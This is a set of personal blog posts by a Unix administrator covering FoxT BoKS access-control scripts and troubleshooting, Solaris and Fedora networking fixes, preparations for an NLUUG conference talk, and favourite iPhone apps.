I sincerely have the utmost faith in digital content delivery. Over the past year we've seen a huge rise in sales of e-readers, which is a great step forward. But we're not there yet! Call me an Apple fanboy if you will, but I do believe the iPad is the next step and who knows what the future will bring after that?! I hear good things about e-ink color screens!

Either way, those things are simply used to carry and present the important bit: content. And how does it get on there? Delivery through the Internet! So far it's working wonderfully on my iPhone.

I've been using Comixology's Comics to both purchase and consume comic books. The buying process couldn't be simpler and IMO pricing is very fair. Most comics ring in at 0.79 euros, with the more popular Marvel comics running 1.59 euros. Choose comic, enter password, download, read. It's wonderfully easy and the Comics app has opened my eyes to a lot of new comics. One of my new favorites is Fearless Dawn.

On a more serious note I'm loving PressReader, which gives you access to 1000+ international news papers. And I don't mean an aggregation of their online content, but the actual full PDFs of each news paper. The application itself is free and comes with seven free issues of any paper of your choosing. The economy subscription to PressReader runs $9.95 and gives you access to 31 issues each month, allowing you to mix and match any papers you would like. There are also more expensive subs, or you can pay as you go at $0.99 per paper.

The economy sub is actually cheaper than most of the online-only subscriptions to dutch news papers. PR gives access to the Volkskrant and the NRC, both of which have a more expensive online-only sub. Only NRC runs cheaper, but only if you pay per-year instead of per-month. Either way, I love reading the paper through PR and assume that it'll only be nicer on the much bigger iPad screen.

Personally I'm sold on on-demand content delivery through the Internet.


kilala.nl tags: , ,

View or add comments (curr. 2)

Evaluation of my NLUUG presentation

2010-06-05 11:32:00

Wow, what a fright! Earlier this week I received an email from the NLUUG conference staff which contained the evaluation of all presentations. Mine was listed with the lowest grade of all at a sucky 5.0. What an awful scare! O-O

I had no clue what'd gone wrong. Sure, I'd talked too fast cutting the presentation short. And yeah, one guy'd told me it was a borderline sales pitch. But overall I thought things'd gone pretty well and I'd gotten some positive reactions!

Eager to hear what went wrong I asked the staff for some more details. Had visitors provided any specific, written feedback? This would of course be a prime learning opportunity! Well, unfortunately such a thing was not available. But! It turns out that, out of fifty attendants, only two people had actually filled out the evaluation. So my 5.0 was down to 4% of the attendants. *phew* That's a bit of a relief :)

On the 22nd I'll be repeating my presentation at the USN monthly get-together. Sounds like fun :)


kilala.nl tags: ,

View or add comments (curr. 2)

NLUUG: we had a good day

2010-05-06 22:33:00

Ehhh. Ehhh... *shrug* I've got some mixed feelings about today.

While my presentation's reception was at least more than lukewarm, our exhibitor's booth was pretty damn quiet. It might've been the location, it might've been the backdrop, it might've been my suit... I dunno. I think we spoke to maybe ten people who weren't ex-colleagues or acquaintances of mine. So, nothing spectacular, but a good day nonetheless.

The great thing about today is that I finally got to meet Adri (a regular reader of my blog and a fellow father-of-a-1.5-year-old-girl) in person. *waves* Thank you very much for the great book you brought me Adri! It's awesome! ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

NLUUG: as ready as we'll be

2010-05-05 22:08:00

The Unixerius booth

Tomorrow's the big day! I'll be presenting at the NLUUG VJ-2010 convention, introducing the attendants to BoKS. I was told to expect a maximum of 80 people in my room, which is kind of reassuring.

Yesterday my colleague Kees and a friend of his built the Unixerius booth which looks smashing, although I personally think it's a bit overkill. I mean, we're bound to get a question like "Say, what's the name of your company again?"


kilala.nl tags: , ,

View or add comments (curr. 3)

The trial went alright

2010-04-20 22:06:00

So, just as a short update: the trial of my BoKS presentation at Proxy went fine :)

I -love- their new office building, which is actually in a rather old, monumental building which has been restored and redecorated. Very nice! I was very anxious all day leading up to the talk, but when I was up there in front of the group everything came naturally. It really helps that I've already done the talk six or seven times, just by myself. It's made the story stick in my head.

Funnily enough I also met the gentleman who'll be gophering the room my talk at NLUUG will be in. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

A lesson I'd do well to learn

2010-04-16 05:52:00

... not because I'm going to work in Japan, but because even in the Netherlands it would be quite, quite helpful.

Quoting Hiko who is giving tips to survive in the Japanese workplace.

There are times in our lives that we have had the joy of letting rip with a phrase of self righteous condemnation like [this is bulls**t!]. Look back and remember those times. Savor them, and cherish them knowing that so long as you are in Japan and wish to remain employed and an unstigmatized non-social-outcast, you will never be able to have memories like ever that again, unless the story ends "and so then I was fired, and left Japan and overall I was a better person for the experience". Japan is a pathologically non-confrontational culture. All that bottled up indignation and rage tends to get released as passive aggression, or internalized into digestive-tract disorders. The best solution is to learn to undo your reflex to want to butt heads and learn how to resolve conflict the Japanese way.


kilala.nl tags: , ,

View or add comments (curr. 4)

Practicing my presentation

2010-04-12 21:56:00

The big presentation at NLUUG is three weeks away and I've been practicing my presentation. Next week I'll do a preview / trial run at Proxy Services, to get into the groove. To be honest I'm quite anxious about the whole deal. *shudder*


kilala.nl tags: ,

View or add comments (curr. 4)

Check_boks_dormant.ksh: Finding unused and inactive user accounts

2010-03-16 22:02:00

Users come and users go and likewise user accounts get created and destroyed. However, sometimes your HR-processes fail and accounts get forgotten and left behind. It may not be obvious, but these forgotten accounts can actually form a threat to your security and should be cleaned up. Many companies even go out and lock or remove accounts of people who actively employed if they go unused for an extended period of time.

This script will help you find these forgotten user accounts, so you can then decide what to do with them.


Usage of check_boks_dormant

./check_boks_dormant [[-u UC] [-H HG] [-h HOST] | -A] [-M MON] [-x UC] [-X HG]  [-d -o FILE] [-f FILE]

-u UCLASS	Check only accounts with profile UCLASS. Multiple -u entries allowed.
-H HGROUP	Check only accounts from HOSTGROUP. Multiple -H entries allowed.
-h HOST		Check ALL accounts involved with HOST. Multiple -h entries allowed.
-A 		Check ALL user accounts.
-M MON		Minimum amount of months that accounts must be dormant. Default is 6.
-x EXCLUDEUC	Exclude all accounts with profile UCLASS. Multiple -x entries allowed.
-X EXCLUDEHG	Exclude all accounts from HOSTGROUP. Multiple -X entries allowed.
-S 		Exclude all accounts who can authenticate with SSH_PK. See "other notes" below.
-f FILE		Log file that contains all dormant accounts. Default logs into $BOKS_var.
-d 		Debug mode. Provides error logging. 
-o FILE		Output file for debugging logs. Required when -d is passed.

When using the -h option, a list will be made of all user accounts involved with this server
regardless of user class or host group. One can exclude certain classes or groups by using
the -x and -X parameters.

Example: 
./check_boks_dormant.ksh -h solaris1 -x RootUsers -x DataTransfer
./check_boks_dormant.ksh -u OracleDBA
./check_boks_dormant.ksh -A -d -o /tmp/foobar

Output

The script does not output to stdout. Instead, all dormant accounts are logged in $BOKS_var/check_boks_dormant.ksh.DATE or another file specified with -f.

The log file in $BOKS_var (or specified with -f) will contain a list of inactive accounts.


Limitations


Other notes

Download

Download check_boks_dormant.ksh
$ wc check_boks_dormant.ksh
     482    2559   17139 check_boks_dormant.ksh

$ cksum check_boks_dormant.ksh
2919189107 17139 check_boks_dormant.ksh

kilala.nl tags: , ,

View or add comments (curr. 1)

Check_boks_replication - Script for monitoring BoKS database replication

2010-03-16 21:43:00

In a BoKS infrastructure the master server automatically distributes database updates to its replicas. BoKS provides the admin with a number of ways to verify the proper functioning of these replicas, but none of these is easily hooked into monitoring software.

This script makes use of the following methods to verify infra sanity. * boksdiag list, to verify if replicas are reachable. * boksdiag sequence, to verify if a replica's database is up to date. * dumpbase -tN | wc -l, to verify the actual files on the replicas.


Usage of check_boks_replication

./check_boks_replication [-l LAG] [-h HOST] [-n] [-d -o FILE]
-l LAG		Maximum amount of updates for a replica table to be behind on.
		Typically this should not be over 50. Default is 30.
-h HOST		Hostname of individual replica to verify.
-x EXCLUDE	Hostname of replica to exclude.
-p		Disable the use of ping in connection testing, in case of firewalls.
-n		Dry-run mode. Will only return an OK status.
-d		Debug mode. Use with dry-run mode to test Tivoli.
-o FILE		Output file for debugging logs. Required when -d is used.
 
Example: ./check_boks_sequence -l 20 -d -o /tmp/foobar

Multiple -h and -x parameters are allowed.

Output

This script is meant to be called as a Tivoli numeric script. Hence both the output and the exit code are a single digit. Please configure your numeric script calls accordingly:

0 = OK
1 = WARNING
2 = SEVERE
3 = CRITICAL


Limitations


Download

Download check_boks_replication.ksh
$ wc check_boks_replication.ksh
     570    2668   17878 check_boks_replication.ksh

$ cksum check_boks_replication.ksh
4063571181 17878 check_boks_replication.ks

kilala.nl tags: , ,

View or add comments (curr. 3)

Integrating your applications with FoxT BoKS

2010-02-11 09:16:00

BoKS provides you with an open architecture, allowing you to integrate BoKS access control with your own applications. The easiest way to do this is by using Pluggable Authentiation Modules (PAM), provided that PAM is available for your operating system of choice. Aside from PAM one could also make use of the APIs provided by FoxT, though I personally don't have experience with that option.


PAM example: using ProFTPd with BoKS

Recently we needed to get FTP up and running on a system that previously only used SCP/SFTP. However, the Solaris-default FTP daemon was never installed, nor does the BoKS package for Solaris include the BoKS FTP daemon. This left us with a few options, including the installation of ProFTPd.

Simply installing and running ProFTPd would leave us with an unsecured system: anybody would be able to login, because BoKS does not yet have any grip on the daemon. Luckily, the integration with BoKS was very easy, thanks to PAM.

  1. Add the following to proftpd.conf:
    <IfModule mod_auth_pam.c>
    AuthPAM on
    AuthOrder mod_auth_unix.c mod_auth_pam.c*
    </IfModule>
  2. In the same proftpd.conf set "UseIPv6" to "off". (Why?)
  3. Restart proFTPd.

It's that simple. Now, let's take a look at what's needed if you don't use an existing access method.


Integrating an application with a new access method

Each application that makes use of PAM will send an identifier to PAM. For example, most FTP daemons will either identify themselves as "ftp" or "ftpd". You will need to edit /etc/pam.conf..ssm (the pam.conf file used when you run sysreplace replace) and add a set of rules for this new PAM identifier. Usually it's enough to take the ruleset defined for FTP and then to adjust the identifier to your own.

Once your pam.conf has been modified, you need to add a new entry to $BOKS_etc/bokspam.conf that ties the new PAM identifier to a BoKS access method. You are free to choose your own method string, as long as it doesn't already exist in $BOKS_etc/method.conf. For applications that simply take an incoming network request it's easiest to copy the line for FTP and set it to your new application.

On the master+replicas and the BoKS clients in question you will finally need to edit $BOKS_etc/method.conf. There you will define the format of access routes for this new method, as well as any modifiers that you desire.

And to my knowledge that's it!

  1. App points to PAM
  2. PAM points to BoKS
  3. bokspam.conf points to access method
  4. method.conf defines access method

kilala.nl tags: , ,

View or add comments (curr. 0)

Apparently writing doesn't always come easy

2010-02-04 15:28:00

So far I'm about fifteen hours into writing the paper that goes with the presentation I will be giving at the NLUUG convention. It's been a while since I wrote an extensive article in English and by $DEITY does it show! I -hate- my writing! There's nothing wrong with my vocabulary, yet I seem to reuse the same words over and over again! There's maybe a dozen words that get used frequently and after reading a page or two it becomes very noticeable. Like I'm constantly stammering "uhhmm", but differently. :/

I feel like that kid from Little Man Tate, doing the show-and-tell (at first I thought it was from Two stupid dogs ^_^ ).

"Clipper Ships" by Matt Montini.

Me and my dad make models of clipper ships. I like clipper ships because they are fast. Clipper ships sail the ocean. Clipper ships never sail on rivers or lakes. Clipper ships have lots of sails and are made out of wood.

Well, first I'll make sure that the story itself's finished. Then I can get started on applying spit&polish. My brain needs a frggin' thesaurus :)


kilala.nl tags: , ,

View or add comments (curr. 1)

How exciting! I'll be presenting at NLUUG

2010-01-31 07:46:00

The NLUUG logo

Yesterday I received an email from the NLUUG (dutch Unix users group) conference bureau:

Dear Thomas,

We have received your abstract for the NLUUG spring conference 2010. We would like to thank you for your submission and your patience.

It is our pleasure to inform you that your abstract has been chosen by the program committee to be presented on May 6th.

Holy carp! This means that I'll be getting on stage, in front of 50-200 Unix admins, my peers if you will. The last time I got in front of a big crowd it was thirty high school juniors, so this is going to be just a -little- bit different. =_=;

Yeah, this is a little scary, aside from being uber-exciting :)


kilala.nl tags: , ,

View or add comments (curr. 8)

Some of my favourite iPhone apps (2)

2010-01-31 06:57:00

iPhone app icons

A little over a year ago I made a list of iPhone apps that I found particularly good, just to share the love. These applications are much better than most of the 140k apps available and, though all of them are paid-for apps, they are well worth getting!

AirVideo, stream video from your Mac/PC to your iPhone/iPad. It supports -ALL-video formats, by performing live conversion, so you can watch -anything- on the go!

Comics, buy and read comic books. Reading is made a very nice experience, because the app takes things one image at a time instead of dumping the whole page on screen.

Dropbox, I've written about this before. It allows me access to my onion file storage, which is synced to all my Macs/PCs. I read comics with the above Comics, watch anime with AirVideo and I read manga and PDFs using Dropbox. What a team!

Zombieville USA and OMG Pirates!, both great side-scrolling fighters by MikaMobile. Zombies, ninjas and pirates, what else do you need?!

Minigore, a frantic, top-down shooter. Easy to pick up, difficult to master.

Orbital, a relaxing and great looking puzzler. Again, easy to play, yet very hard to master.

Sudoku unlimited, for all I care the -best- sudoku app because of its "Newspaper" theme. Looks great, plays great.

So, from the list it should be apparent that I play a lot of games on my iPhone. These games are great for a short pickup-and-play during small "cigarette breaks" at the office and during my daily commute.

Mind you, now that Apple have introduced their new iPad I imagine some great productivity tools to come out as well!


kilala.nl tags: , , ,

View or add comments (curr. 2)

Check_boks_queues: Tracking the status of your BoKS clntd queues

2010-01-13 06:33:00

Every time a BoKS client becomes unreachable the master server will retain updates for this client in a queue. Over time this queue will continue to grow, containing all manner of updates to /etc/passwd, /etc/shadow and so forth. Without these updates the client will become out of date and known-good passwords will stop working. You could lose access to the root account if you don't keep a history of the previous passwords!

This simple Tivoli plugin will warn you of any client queues that exceed a certain size or age, with both thresholds adjustable from the command line.


Usage of check_boks_queues

./check_boks_queues [-m MESS] [-a AGE] [-d -o FILE] [-f FILE]

-m MESS		Threshold for amount of messages. Default is 40 messages.
-a AGE		Threshold for age of client queue. Default is 24 hours.
-f FILE		Log file that queues that are over threshold. Default logs into $BOKS_var.
-d 		Debug mode. Provides error logging. 
-o FILE		Output file for debugging logs. Required when -d is passed.

The -a parameter requires BoKS 6.5.x. It DOES NOT work in 6.0.x and older versions.

Example: 
./check_boks_queues -m 50 -f /tmp/over50.txt
./check_boks_queues -a 168 -f /tmp/oneweek.txt

Output

This script is meant to be called as a Tivoli numeric script. Hence both the output and the exit code are a single digit. Please configure your numeric script calls accordingly:

The log file in $BOKS_var (or specified with -f) will contain a list of queues that are stuck.


Limitations


Download

Download check_boks_queues.ksh
BoKS > wc check_boks_queues.ksh
     299    1413    9307 check_boks_queues.ksh
BoKS > cksum check_boks_queues.ksh
1047961426      9307    check_boks_queues.ksh

kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: corrupt message queues

2010-01-12 20:36:00

Today I ran into a problem I hadn't encountered before: seemingly out of the blue one of our BoKS client systems would not allow you to login. The console showed the familiar "No contact with BoKS. Only "root" may login." message. The good thing was that the master could still communicate with the client through the clntd channel, so at least I could do a sysreplace restore through cadm -s.

We were originally alerted about this problem after the client in question has started reporting it's /var partition had reached 100%. After logging in I quickly saw why: for over 24 hours the bridge_servc_s process had been dumping core, with hundreds of core dumps in /var/core. This also explained why logging in does not work, but master-to-client comms were still OK. /var/adm/messages also confirmed these crashes, showing that the boks_bridge process kept on restarting and dying on a SIGBUS signal.

The $BOKS_var/boks_errlog file showed these messages between a restart and a rekill of BoKS:

boks_init@CLIENT Tue Jan 12 09:52:09 2010
  INFO: Max file descriptors 1024
boks_sshd@CLIENT Tue Jan 12 09:52:09 2010
  WARNING: Could not load host key: /etc/opt/boksm/keys/host.kpg
boks_udsqd@CLIENT Jan 12 09:52:09 [servc_queue]
  WARNING: Failed to connect to any server (0/1). Last attempt to ".servc", errno 146
boks_init@CLIENT Tue Jan 12 09:52:09 2010
  WARNING: Respawn process bridge_servc_s exited, reason: signal SIGBUS. Process restarted.
boks_udsqd@CLIENT Jan 12 09:52:10 [servc_queue]
  WARNING: Dropping packet. Server failed to accept it
boks_init@CLIENT Tue Jan 12 09:52:13 2010
  WARNING: Respawn process bridge_servc_s exited to often, NOT respawned
boks_init@CLIENT Tue Jan 12 09:53:26 2010
  WARNING: Dying on signal SIGTERM

This indicates that none of the replicas was accepting servc request from the client, which again explains why one could not login, nor use suexec etc. Checking the $BOKS_var/boks_errlog file on the replicas explained why the servc requests were being rejected:

%oks_bridge@REPLICA Mon Jan 11 22:41:16 2010
  ERROR: Got malformed message from 192.168.10.113
%oks_bridge@REPLICA Tue Jan 12 01:04:06 2010
  ERROR: Got malformed message from 192.168.10.113
%oks_bridge@REPLICA Tue Jan 12 01:07:46 2010
  ERROR: Got malformed message from 192.168.10.113

And so on... After deliberating with FoxT tech support they concluded that the client must have had a message in its outgoing servc queue that had gotten damaged. They suggested that I make a backup of $BOKS_var/data/crypt_spool/servc and then remove the files in that directory. Normally it's not a good idea to remove these files, as they may contain password-change requests from users, but in this case there wasn't much else we could do. Remember though, leave the crypt_spool directory alone on the master and replicas, because that stuff's even more important!

What do you know? After clearing out the message queue the client worked perfectly. I'm now working with FoxT to find out which one of the few dozen messages was the corrupt one. In the process I'm trying to learn a little about the insides of BoKS. For example, looking at the message files it seems that either they were ALL deformed, or BoKS doesn't actually have a uniform format for them, because some contained a smattering of newline characters, while other files were one long line. I'm still waiting for a reply on that question.


kilala.nl tags: , ,

View or add comments (curr. 0)

boks_set_passwd.ksh - Quick and dirty script to set a password

2010-01-11 17:32:00

Sometimes you're in a hurry and need to set a new, random password on an account. Don't feel your random banging the keyboard is random enough? Then use this script instead.


Usage of boks_set_passwd

./boks_set_passwd.ksh [HGROUP|HOST]:USER

Example: 
./boks_set_passwd.ksh SUN:thomas
./boks_set_passwd.ksh solaris2:root

Output

Three fields get echoed to stdout: the username, the password and the encrypted password string (should you ever need it).


Limitations


Download

Download boks_set_passwd.ksh
$ wc boks_set_passwd.ksh 
      92     389    2369 boks_set_passwd.ksh

$ cksum boks_set_passwd.ksh 
2167470539 2369 boks_set_passwd.ksh

kilala.nl tags: , ,

View or add comments (curr. 2)

Check_boks_rootpw - Script for monitoring of root password consistency

2010-01-10 21:51:00

In a BoKS domain root passwords are stored in a number of locations. In order to guarantee proper functioning of the root password one will need to verify that the password stored in all three locations is identical. The three locations are:

Brpf in this case stands for "BoKS Root Password File". It is used to allow the root user to login through a system's console if the BoKS client cannot communicate with the master server.

This script uses functionality from the boks_new_rootpw.ksh script to test all three locations of the BoKS root password.


Usage of check_boks_rootpw

./check_boks_rootpw.ksh [[-h HOST] [-H HG] [-i FILE] | -A] [-x HOST] [-X HG]  [-d -o FILE] [-f FILE]

-h HOST		Verify the root password for HOST. Multiple -h entries allowed.
-H HGROUP	Verify the root passwords for HOST GROUP. Multiple -H entries allowed.
-i FILE		Verify the root passwords for all hosts in FILE.
-A 		Verify the root passwords for ALL hosts.
-x EXCLUDE	Hosts to exclude (when using -H or -A). Multiple -x entries allowed.
-X EXCLUDEHG	Host groups to exclude (when using -A). Multiple -X entries allowed.
-f FILE		Log file that lists errors in root password files. Default logs into $BOKS_var.
-d 		Debug mode. Provides error logging. Does a dry-run, not doing any updates.
-o FILE		Output file for debugging logs. Required when -d is passed.

Example: 
./check_boks_rootpw.ksh -h HOST1 -h HOST2 -f $BOKS_var/root.txt
./check_boks_rootpw.ksh -A -d -o /tmp/foobar

Multiple -h, -H, -i, -x and -X parameters are allowed.

Output

This script is meant to be called as a Tivoli numeric script. Hence both the output and the exit code are a single digit. Please configure your numeric script calls accordingly:

0 = OK, everything OK.
1 = WARNING, an wrong parameter was entered.
2 = SEVERE, a root password is inconsistent. Check log file.
3 = CRITICAL, not used.


Limitations


Download

Download check_boks_rootpw.ksh
$ wc check_boks_rootpw.ksh 
     467    2162   14401 check_boks_rootpw.ksh

$ cksum check_boks_rootpw.ksh 
3050878034 14401 check_boks_rootpw.ks

kilala.nl tags: , ,

View or add comments (curr. 2)

Check_boks_ssmactive: Script to verify client BoKS security

2010-01-10 21:44:00

The check_boks_client script checks many different things on a per-client basis. That particular script needs to run locally on the client itself. This script, check_boks_ssmactive, is meant to do one quick check on a clients, from the master server. The only thing it checks is whether BoKS security is actually active on the client, which is rather important!

By running this script from the master server you can blanket your whole domain in one blow.


Usage of check_boks_ssmactive

./check_boks_ssmactive [[-h HOST] [-H HG] [-i FILE] | -A] [-x HOST] [-X HG]  [-d -o FILE] [-f FILE]

-h HOST		Verify the root password for HOST. Multiple -h entries allowed.
-H HGROUP	Verify the root passwords for HOST GROUP. Multiple -H entries allowed.
-i FILE		Verify the root passwords for all hosts in FILE.
-A 		Verify the root passwords for ALL hosts.
-x EXCLUDE	Hosts to exclude (when using -H or -A). Multiple -x entries allowed.
-X EXCLUDEHG	Host groups to exclude (when using -A). Multiple -X entries allowed.
-f FILE		Log file that lists errors in root password files. Default logs into $BOKS_var.
-d 		Debug mode. Provides error logging. Does a dry-run, not doing any updates.
-o FILE		Output file for debugging logs. Required when -d is passed.

Example: 
./check_boks_ssmactive.ksh -h HOST1 -h HOST2 -f $BOKS_var/BOKSdisabled.txt
./check_boks_ssmactive.ksh -A -d -o /tmp/foobar

Multiple -h, -H, -i, -x and -X parameters are allowed.

Output

This script is meant to be called as a Tivoli numeric script. Hence both the output and the exit code are a single digit. Please configure your numeric script calls accordingly:

0 = OK, everything OK or clients unreachable.
1 = WARNING, an wrong parameter was entered.
2 = SEVERE, one or more hosts are NOT secure. Check log file.
3 = CRITICAL, not used.

The log file in $BOKS_var (or specified with -f) will contain a list of hosts that have BoKS disabled.


Limitations


Download

Download check_boks_ssmactive.ksh
$ wc check_boks_ssmactive.ksh 
     440    2041   13544 check_boks_ssmactive.ksh

$ cksum check_boks_ssmactive.ksh 
3734761991 13544 check_boks_ssmactive.ks

kilala.nl tags: , ,

View or add comments (curr. 0)

Boks_new_rootpw.ksh - Script for automatic changing of root passwords

2010-01-10 20:49:00

This script can be used to generate, set and verify a new password for any root account within your BoKS domain. It could be used as part of your monthly root password reset cycle, or for daily maintenance purposes. Functionality of the script includes:


Usage of check_boks_replication

./boks_new_rootpw [[-h HOST] [-H HG] [-i FILE] | -A] [-x HOST] [-X HG] [-f FILE] [-d -o FILE]

-h HOST		Change the root password for HOST. Multiple -h entries allowed.
-H HGROUP	Change the root passwords for HOSTGROUP. Multiple -H entries allowed.
-i FILE		Change the root passwords for all hosts in FILE.
-A 		Change the root passwords for ALL hosts.
-x EXCLUDE	Hosts to exclude (when using -H or -A). Multiple -x entries allowed.
-X EXCLUDEHG	Hostgroups to exclude (when using -A). Multiple -X entries allowed.
-f FILE		Output file to store the new root passwords in. Default is stdout.
-d 		Debug mode. Provides error logging. Does a dry-run, not doing any updates.
-o FILE	Output file for debugging logs. Required when -d is passed.

Example: 
./boks_new_rootpw -h HOST1 -h HOST2 -f $BOKS_var/root.txt
./boks_new_rootpw -A -d -o /tmp/foobar

Multiple -h, -H, -i, -x, and -X entries are allowed.

Output

If you do not use the -f flag to indicate an output file, the script will output everything to stdout. The output consists of a listing of hostname, plus root password, plus encrypted password string. Either way you may want to keep this output somewhere safe, for reference.

When running in debug/dry-run mode, the script outputs log messages to the output file specified with the -o flag. This file will show detailed error reports for failing root updates. BEWARE: THE DEBUG LOG WILL CONTAIN (UNUSED) ROOT PASSWORDS.

All (temporary) files created by this script are 0600, root:root. Duh! ^_^


Limitations


Download

Download boks_new_rootpw.ksh
$ wc boks_new_rootpw.ksh
     525    2549   16959 boks_new_rootpw.ksh

$ cksum boks_new_rootpw.ksh
4078240301 16959 boks_new_rootpw.ksh

kilala.nl tags: , ,

View or add comments (curr. 3)

Hacking BoKS 6.5 to run on Fedora

2010-01-10 15:10:00

The past few weeks I've spent a few hours here-and-there, trying to get BoKS 6.5 to run on Fedora Core 12. Why? Because FoxT's list of supported platforms only has commercial Linuxes on there. The last free version on there is RedHat 7. I've asked my contacts at FoxT whether they're looking at converting BoKS for free Linuxes, like Fedora.

Unfortunately my efforts were only partially successful. I've used the base BoKS 6.5.2 package for RHEL, which requires a few tweaks to make it work. In the end I got SSH and SU to work properly, but "su -l" and telnet don't work. You can telnet into the Fedora box, but it's never checked for authorization, though servc on the master does receive the request. Also, "su -l" fails immediately with the message "su: password incorrect" without even asking for my password.

I've compiled a list of about a dozen tweaks and extra packages that are needed to get to this point, but I'm far from having a proper BoKS client on Fedora.


kilala.nl tags: , ,

View or add comments (curr. 1)

Network configuration on Red Hat and Fedora WTF?!

2009-12-05 22:10:00

Why the frag does the IPv4 networking setup on Red Hat and Fedora Linii need to be so damn complicated? I've just spent half an hour Googling to find the right commands to ensure that my Fedora 12 VM in Parallels configures its eth0 at boot time. Seriously, compare the two:

Solaris 10:

1. Enter hostname and IP in /etc/hosts

2. Enter hostname in /etc/hostname.ni0

3. Enter network base IP and netmask in /etc/netmasks

Fedora 12:

1. Run system-config-network. Fill out all details.

2. Enter hostname and IP in /etc/hosts

3. Enter hostname in /etc/sysconfig/network

4. Set "ONBOOT" to yes in /etc/sysconfig/networking/devices/ifcfg-eth0

5. Run: chkconfig --level 35 network on

Seriously, who the fsck comes up with that last line?! I already have the network startup scripts in /etc/init.d and everything in /etc/sysconfig is set up and I -still- need to enable the network config to be loaded at boot time? WTF?! A few years back I had the same fights with setting up static routes that needed to be carried over reboots.

I fscking hate Red Hat.


kilala.nl tags: , ,

View or add comments (curr. 2)

Repairing Solaris 10 networking in Parallels Desktop 5

2009-12-04 18:33:00

The Parallels support team finally came through. Earlier, I reported network problems with Solaris 10 and Parallels Desktop 5. After upgrading to Parallels 5 my virtual NICs were not getting detected anymore and ifconfig was completely unable to plumb my ni0 or ni1 interfaces.

It took us over three weeks of mailing back and forth, but finally the Parallels team were able to both reproduce the issue and to provide a fix. Here's the summary of what tech support told me.

Cause of the problem

Parallels Desktop 5 now supports 64-bit operating systems. Furthermore, it will now by default boot any capable OS into 64-bit mode. This means that all of my Solaris 10 VMs that had been running in 32-bit mode all of a sudden switched over to 64-bit. This also means that any 32-bit only drivers are rendered unusable. This is what broke the usage of Parallels' virtual network interfaces.

Solution 1: forcing the OS back to 32-bit mode

1. Stop the VM

2. Go to VM configuration -> Hardware -> Boot order.

3. In the "boot parameters" field enter: devices.apic.disable=1

3a. Alternatively, add the following to /etc/system: set pcplusmp:apic_forceload = -1

4. Boot the VM.

5. As root run: /usr/sbin/eeprom boot-file="kernel/unix"

Solution 2: recompiling the RTL3829 drivers as 64-bit

1. Start the VM

2. Remove the old drivers. Run: rem_drv ni

3. Mount the Parallels tools CDROM ISO image on /cdrom.

4. Run: cd /cdrom/Drivers/Network/RTL3829

5. Run: cp -rp SOLARIS /tmp

6. Run: cd /tmp/SOLARIS

7. Edit the network.sh file and add the following lines right before the echo of "Compiling driver".

PATH=$PATH:/usr/sfw/bin

rm $driver/Makefile

ln -s $tmpdir/$driver/Makefile.amd64_gcc $tmpdir/$driver/Makefile

8. Save the file and run: ./network.sh

9. Answer the usual questions to configure the NIC. Then reboot.

I went with the second solution (might as well stay running in 64-bit mode now that I can). I can confirm that it works and that my NI interface is now back. You may find that network.sh configured the ni0 interface, while it's actually called ni1. Reconfigure if needed by moving /etc/hostname.ni0 to /etc/hostname.ni1.


kilala.nl tags: , , ,

View or add comments (curr. 3)

FoxT BoKS: changing a (root) user's password

2009-11-18 07:45:00

Speaking of over thinking things...

Recently I've been working on my script for the mass changing of root passwords, right? After working on it for a few days I've found three four five ways of changing a (root) user's password.

1. passwd $HOST:root

2. modbks -l $HOST:root -p "$ENCPASSWD"

3. boksauth -c FUNC=change_psw ... NEWPSW="$PASSWD"

4. boksauth -c FUNC=write TAB=1 ... +PSW="$ENCPASSWD"

5. restbase -s 1 ... $UPDATEFILE

Options 1 and 3 both use the plain text password string, where option 1 is obviously not useful for mass password changes because it's an interactive command. On the other hand options 2 and 4 both use the encrypted password string, thus creating the need for an encryption routine like Perl's "print crypt" method.

Options 3 and 4 are kludges because you're using the "boksauth" command to send calls directly to the servc process as if you were a piece of BoKS client software.

Option 5 is just too nasty to consider. Using the "restbase" command you can restore or overwrite parts of the BoKS database from plain text files in the BoKS dump ("dumpbase") format. This means that you could technically speaking make an update file containing an edited entry for the user in question, containing the new encrypted password string in the PSW field.

In my script I originally used option 2, but was dissatisfied with it because it did not update the PSWLASTCHANGE field in table 1. This in turn was screwing up our SOx audits, because all of our root passwords were listed as being over a year old which obviously wasn't true. This is why I switched to using "boksauth" and option 3.

And that's where the over thinking comes into the story. I don't know why both I and the guys from FoxT didn't think of this, but let's check the "modbks" man-page:

-L days = Set password last change date back days days.

Hooray for reading comprehension! /o/

This means that by simply adding "-L 0" to my modbks command I could've reset the PSWLASTCHANGE field to today. And it works for both BoKS 6.0 and BoKS 6.5. How did I miss this? I think I just need to sit down and read all BoKS man-pages because who knows what else I can come up with? :)


kilala.nl tags: , ,

View or add comments (curr. 1)

FoxT BoKS: forcing a user to change his password

2009-11-18 07:19:00

Sometimes I think too far out of the box :)

I have always been up front about what I think about FoxT's BoKS security software: it's good stuff, but sometimes it's a bit kludgy. Today I learned that I shouldn't let this cloud my judgment too much because sometimes BoKS -does- do things elegantly ^_^;

A colleague of mine asked me the following question: Is it possible to force a user to change his password on the next login, -without- using the web interface?.

Seems straightforward enough, right? However, in my clouded mindset I completely over thought the whole matter and started digging in the database. Table 1 of the BoKS database should contain the relevant information, but which field could it be? Two fields seem to stand out, but neither is related.

BoKS > dumpbase -t1 | grep ru13rs

RLOGNAME="SECURITY:thomas" UID="1000" GID="1000" PROFILE="SecuritySupport" REALNAME="Thomas Sluyter" HOMEDIR="thomas" USERLASTCHANGE="1224244960" FLAGS="16384" PSW="39ajnasdlfkj4" PSWLASTCHANGE="1256545622" NO_PWDF="0" SERIAL="" PSWKEY="6436" LASTTTY="servera:pts/17" LASTLOGIN="1258524725" LASTLOGOUT="1258465492" RETRY="0" RESERVED1="125196" RESERVED2="" LOGINVALIDTIME="0" PSWVALIDTIME="0" CHPSWTIME="0" PSWMINLEN="0" PSWFORCE="0" PSWHISTLEN="0" CHPSWFREQ="0" TIMEOUT="0" TTIMEOUT="0" TDAYS="0" TSTART="0" TEND="0" RETRYMAX="0" CONCUR_LOGINS="0" SHELL="/bin/ksh" PARAMETERMASK="16384" PSDPSW="" PSDPSWLASTCHANGE="0" PSDPSWRETRIES="0" PSDBLOCKED="0" PSDBLOCKEDTIME="0" FEK="" GEKVER="" MD5DN="" LASTDTLOGIN="0" SETTINGVER=""

